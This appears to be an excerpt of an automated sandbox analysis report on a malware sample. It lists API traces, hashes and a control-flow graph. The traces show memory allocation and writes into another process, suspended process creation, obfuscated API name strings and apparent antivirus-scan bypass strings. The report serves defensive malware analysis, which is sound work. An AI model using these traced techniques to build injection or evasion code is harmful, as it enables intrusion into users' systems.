                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: 0b3f16bf71b603cf2dc5622c1a2d86a8eaf6445eb6821afd6b1c08cc4a454cbd
                                                                  • Instruction ID: 381347c2ae71e882bb870bb8a97beaf5ffcec271a75435e28ee1ddd1b8c22634
                                                                  • Opcode Fuzzy Hash: 0b3f16bf71b603cf2dc5622c1a2d86a8eaf6445eb6821afd6b1c08cc4a454cbd
                                                                  • Instruction Fuzzy Hash: 59115B75680208AFEB06EFA4DD51EDFF7EEEB48700F619464B904D7640D630AA11CF60
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                  • API String ID: 2719805696-3542721025
                                                                  • Opcode ID: e75cd66228a099303f8ca55638dd93565cf6d3d8959bbb4d79f79f573ebc0035
                                                                  • Instruction ID: 6275aa666af5d4298b82e66a34fc8127b3c2c24cb35207e28a030574e06699c6
                                                                  • Opcode Fuzzy Hash: e75cd66228a099303f8ca55638dd93565cf6d3d8959bbb4d79f79f573ebc0035
                                                                  • Instruction Fuzzy Hash: D3014CB6680208AFEB05EFE8DD51E9BF7EEEB49700F619858B904D7640D630AD11CF64
                                                                  APIs
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
                                                                  • RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
                                                                  • NtDeleteFile.NTDLL(?), ref: 02ECDC65
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 3559453722-0
                                                                  • Opcode ID: 5b7919ed9187391b083189a6bb13f273a831ba9123996392cdf0646aaa6bb7da
                                                                  • Instruction ID: 2b53119bac0f982d859deb18e31a51dafab501488b21ee44f5c0d0f70a39b82d
                                                                  • Opcode Fuzzy Hash: 5b7919ed9187391b083189a6bb13f273a831ba9123996392cdf0646aaa6bb7da
                                                                  • Instruction Fuzzy Hash: D70162759842086EEB05DBE0CE91FCD77BDAF44704F6194B6E200E7081DA75AB098B20
                                                                  APIs
                                                                    • Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
                                                                  • RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
                                                                  • NtDeleteFile.NTDLL(?), ref: 02ECDC65
                                                                    • Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                  • String ID:
                                                                  • API String ID: 2841551397-0
                                                                  • Opcode ID: a0b0ee858e1da56ce0abe20979be9b26c97c9dcfa1f1eef82589ab1cc77bfb6d
                                                                  • Instruction ID: 943e05f712267774734c9f55c9c17a1e8a857556b16176345666f915dbd010fe
                                                                  • Opcode Fuzzy Hash: a0b0ee858e1da56ce0abe20979be9b26c97c9dcfa1f1eef82589ab1cc77bfb6d
                                                                  • Instruction Fuzzy Hash: 5101F87598420CBAD711EBE0DD51FCEB3BDDB44700F619475F600E3580EB756B058A64
                                                                  APIs
                                                                    • Part of subcall function 02EC6D7C: CLSIDFromProgID.OLE32(00000000,?,00000000,02EC6DC9,?,?,?,00000000), ref: 02EC6DA9
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02EC6EBC,00000000,00000000,02EC6E3B,?,00000000,02EC6EAB), ref: 02EC6E27
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromInstanceProg
                                                                  • String ID:
                                                                  • API String ID: 2151042543-0
                                                                  • Opcode ID: 7d774b5db16f90e5885c9f0c716d6eb3980b38234879fc3a65d40654cec8e8be
                                                                  • Instruction ID: 20a10540b8f2aa58b02fa42c4fc46930715eee6a63c045bc3215aa07501dc2b3
                                                                  • Opcode Fuzzy Hash: 7d774b5db16f90e5885c9f0c716d6eb3980b38234879fc3a65d40654cec8e8be
                                                                  • Instruction Fuzzy Hash: 6E012B706887046EF711EFE0DD228AF7BBDDBC9B00F61983AF401E2650E6309E11C864
                                                                  APIs
                                                                    • Part of subcall function 02ECAB20: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECADAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 2242398760-0
                                                                  • Opcode ID: 5a47bcb1648fd3fb4811dbc945191ae34f23f91745483c17c86ca37c24748c11
                                                                  • Instruction ID: 9149f24bb59ec1afeb461fdd320b95e4accaac1e200c007dc540ef2b023c867c
                                                                  • Opcode Fuzzy Hash: 5a47bcb1648fd3fb4811dbc945191ae34f23f91745483c17c86ca37c24748c11
                                                                  • Instruction Fuzzy Hash: 0DC012B2641124168E2069F429844C2974EC9460FB3145872B504D2201D6254C129290

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4574 2ed812c-2ed851b call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 4689 2ed93a5-2ed9528 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb48ec 4574->4689 4690 2ed8521-2ed86f4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb47ec call 2eb49a0 call 2eb4d74 call 2eb4df0 CreateProcessAsUserW 4574->4690 4780 2ed952e-2ed953d call 2eb48ec 4689->4780 4781 2ed9cf9-2edb2fe call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 * 16 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2eb46d4 * 2 call 2ec89e0 call 2ec7c20 call 2ec8348 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 ExitProcess 4689->4781 4799 2ed86f6-2ed876d call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 4690->4799 4800 2ed8772-2ed887d call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 4690->4800 4780->4781 4788 2ed9543-2ed9816 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecf098 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb7e6c 4780->4788 5046 2ed981c-2ed9aee call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ece35c call 2eb4530 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4de0 * 2 call 2eb4764 call 2ecdc90 4788->5046 5047 2ed9af3-2ed9cf4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb49f8 call 2ec8d74 4788->5047 4799->4800 4900 2ed887f-2ed8882 4800->4900 4901 2ed8884-2ed8ba4 call 2eb49f8 call 2ecde54 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecd168 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 4800->4901 4900->4901 5217 2ed8bbd-2ed93a0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 ResumeThread call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 CloseHandle call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec8090 call 2ec895c * 6 CloseHandle call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 4901->5217 5218 2ed8ba6-2ed8bb8 call 2ec8740 4901->5218 5046->5047 5047->4781 5217->4689 5218->5217
                                                                  APIs
                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0302B7E0,0302B824,OpenSession,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED86ED
                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC), ref: 02ED8D37
                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380), ref: 02ED8EB6
                                                                    • Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                    • Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                    • Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02F37380,02EDB7BC,UacInitialize,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED92A8
                                                                    • Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77
                                                                    • Part of subcall function 02ECDC90: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
                                                                    • Part of subcall function 02ECDC90: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
                                                                    • Part of subcall function 02ECDC90: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
                                                                    • Part of subcall function 02ECDC90: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F
                                                                    • Part of subcall function 02EC8348: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02EC83D2), ref: 02EC83B4
                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,Initialize,02F37380,02EDB7BC,00000000,00000000,00000000,ScanString,02F37380,02EDB7BC), ref: 02EDB2FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
